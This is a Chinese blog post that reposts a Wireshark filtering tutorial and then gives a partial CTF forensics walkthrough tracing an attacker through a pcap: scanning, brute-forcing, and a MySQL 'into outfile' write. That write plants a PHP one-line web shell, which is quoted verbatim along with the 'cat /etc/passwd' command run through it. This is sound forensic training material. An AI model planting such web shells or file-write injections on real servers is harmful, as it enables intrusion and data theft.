捕获完成之后可以查找需要的包；

先看一下查找对话框；可以有四种查找方式，显示过滤器、十六进制值、字符串、正则表达式；

看一下当前Wireshark版本是3.0.0；不同版本可能查找对话框有所区别；

输入过滤表达式，查找ip为112.34.111.26的包；定位到第一个ip为112.34.111.26的包；

查找包含十六进制值的包，输入值ff ff；查找；定位到找到的第一个包；

按字符串查找；输入字符串baidu；查找；定位到找到的第一个包；在下图中是22号包；

一、网络分析

0×00：只抓包头
在进行网络分析时往往只需要知道两个节点是不是能够联通，具体的传输信息并不重要，所以抓包的时候可以设置只抓包头，这样就大大减少了数据包的大小，有利于数据分析。
设置方法：Capture（捕获）–>Options（选项）–>Snaplen（Snap长度）。
将这个值设置200以下就可以抓到所有网络层次的头信息了。

另外也可以直接点击任务栏里的快捷键，快速设置

0×01：只抓必要的包
我们可以设置抓包的filter，只抓一些感兴趣的包。
设置方法：Capture（捕获）–>Options（选项）–>Capture Filter（捕获过滤器）

在输入框里输入规则，然后点击开始即可，比如输入
dst host 220.181.111.188（捕获目标主机为220.181.111.188的数据包）
220.181.111.188是ping www.baidu.com的ip地址，不同地理位置ping的ip可能不一样，然后浏览器访问百度就可以看到我们想要的捕获结果。

0×02：过滤
使用过滤规则进行数据包筛选是Wireshark最强大的功能之一，比如如果知道问题发生的具体协议就可以以协议名称过滤。使用协议过滤时要注意协议之间的依赖性，比如NFS共享挂载失败，问题可能发生在挂载所用的mount协议，也可能发生在mount之前的portmap协议。

然后就是IP+端口的方式，一个比较简单的方法就是可以在感兴趣的数据包上右键然后点击“追踪流”，就可以看到与这对ip和端口的全部通信。

也可以在相应的包上右键–>Apply as Filter（作为过滤器应用）–>Selected（选中），Wireshark就可以自动生成相应的过滤规则。这里给出一些常用的规则。
过滤IP：
IP源地址：ip.src 192.168.1.1
IP目的地址：ip.dst 192.168.1.1
IP地址（包括源和目的）：ip.addr== 192.168.1.1
过滤端口：
TCP端口：tcp.port80
TCP目的端口：tcp.dstport == 80
TCP源端口：tcp.srcport == 80
UDP端口：udp.port eq 15000
TCP 1-80之间的端口：tcp.port >= 1 and tcp.port <= 80
过滤协议：
http、tcp、udp、arp、icmp、http、smtp、ftp、dns 等。
过滤MAC地址：
源MAC地址：eth.srcA0:00:00:04:C5:84
目的MAC地址：eth.dstA0:00:00:04:C5:84
MAC地址（包括源和目的）：eth.addrA0:00:00:04:C5:84
过滤包长度：
整个UDP数据包：udp.length==20
TCP数据包中的IP数据包：tcp.len>=20

整个IP数据包：ip.len20
整个数据包：frame.len20
HTTP模式过滤：
请求方法为GET：http.request.method==“GET”
请求方法为POST：http.request.method==“POST”
指定URI：http.request.uri==“/img/logo-edu.gif”
请求或相应中包含特定内容：http contains “FLAG”

0×03：自动分析
Wireshark有强大的统计分析功能，可以帮助分析人员快速统计出一些基本信息。比如点击Analyze（分析）–>Expert InfoComposite（专家信息），就可以看到数据包的中的一些不同级别的信息统计，包含重传次数、链接建立次数、网络错误等，在分析网络性能时这个功能很有作用。

单击Statistics（统计）–>TCPStream Graph（TCP流图形），可以生成一些统计图表，比如下图表示171到192的数据传输过程，水平线表示短暂的停止过程。

此外还可以统计分层信息、网络会话列表、网络端点列表、ip地址统计列表、应用层数据包信息等。

0×04：搜索
按“Ctrl+F”Wireshark也可以进行关键字搜索，选择“分组详情”后才可以搜索数据包中的内容，这样的搜索可以在CTF中也许会有意外收获。

其实没看懂，先转过来以后练习把
原文章下面还有关于 CTF 、Tshark（不了解）和 使用Python进行数据包分析 的讲解
转载自https://www.freebuf.com/column/155600.html

wireshark数据包分析

Wireshark（前称Ethereal）是一个网络封包分析软件。网络封包分析软件的功能是截取网络封包，并尽可能显示出最为详细的网络封包资料。Wireshark使用WinPCAP作为接口，直接与网卡进行数据报文交换。

数据包分析器又名嗅探（Sniffers），是一种网络流量数据分析的手段，常见于网络安全领域使用，也有用于业务分析领域，一般是指使用嗅探器对数据流的数据截获与分组分析（Packet analysis)。

wireshark下载地址 https://www.wireshark.org/download.html

以上摘自百度

1.某公司网络系统存在异常，猜测可能有黑客对公司的服务器实施了一系列的扫描和攻击，使用Wireshark抓包分析软件查看并分析Kali Linux的/root目录下dump.pcapng数据包文件，找到黑客的IP地址，并将黑客的IP地址作为Flag值（如：172.16.1.1）提交；

过滤tcp.connection.syn （tcp）包

Source来源，Destination目的地

来源地址172.16.1.110，所以黑客ip172.16.1.110

2.继续分析数据包文件dump.pcapng分析出黑客通过工具对目标服务器的哪些服务进行了密码暴力枚举渗透测试，将服务对应的端口依照从小到大的顺序依次排列作为Flag值（如：77/88/99/166/1888）提交；

过滤tcp.connection.syn and ip.src == 172.16.1.110

发现ftp，ssh，telnet，mysql，所以端口有21/22/23/3306

3.黑客扫描后可能首先对目标服务器的某个服务实施了攻击，继续查看数据包文件dump.pcapng分析出黑客成功破解了哪个服务的密码，并将该服务的版本号作为Flag值(如：5.1.10)提交；

过滤 ip.addr == 172.16.1.110 and tcp.port == 3306

request请求，追踪流TCP，服务版本5.7.26

4.继续分析数据包文件dump.pcapng，黑客通过数据库写入了木马,将写入的木马名称作为Flag值提交（名称不包含后缀）；

过滤mysql，黑客利用mysql上传了一个php木马，tcp追踪流

发现黑客在/var/www/html上传,horse.php木马

5.继续分析数据包文件dump.pcapng，黑客通过数据库写入了木马,将黑客写入的一句话木马的连接密码作为Flag值提交；

黑客在mysql写入，select ‘<?php @eval($_POST[lqsym])?>’ into outfile ‘/avr/www/html/horse.php’

6.继续分析数据包文件dump.pcapng，找出黑客连接一句话木马后查看了什么文件，将黑客查看的文件名称作为Flag值提交；

黑客是在/var/www/html上传的木马，所以要在数据包过滤http

http connections “horse.php”

追踪流，HTTP，发现路径遍，黑客使用了cat /etc/passwd命令，所以黑客查看的文件名称是passwd

7.继续分析数据包文件dump.pcapng，黑客可能找到异常用户后再次对目标服务器的某个服务进行了密码暴力枚举渗透，成功破解出服务的密码后登录到服务器中下载了一张图片，将图片文件中的英文单词作为Flag值提交。

发现黑客使用了/etc/passwd路径遍历发现suictsr247用户

在主页搜索字符串suictsr247

黑客对靶机实施ftp暴力破解，使用过滤规则ftp contains “230” 进行过滤

追踪流tcp

会话流发现flag.jpg的文件大小为56489字节
过滤ftp-data
追踪任意一个包，TCP，要改为原始数据查看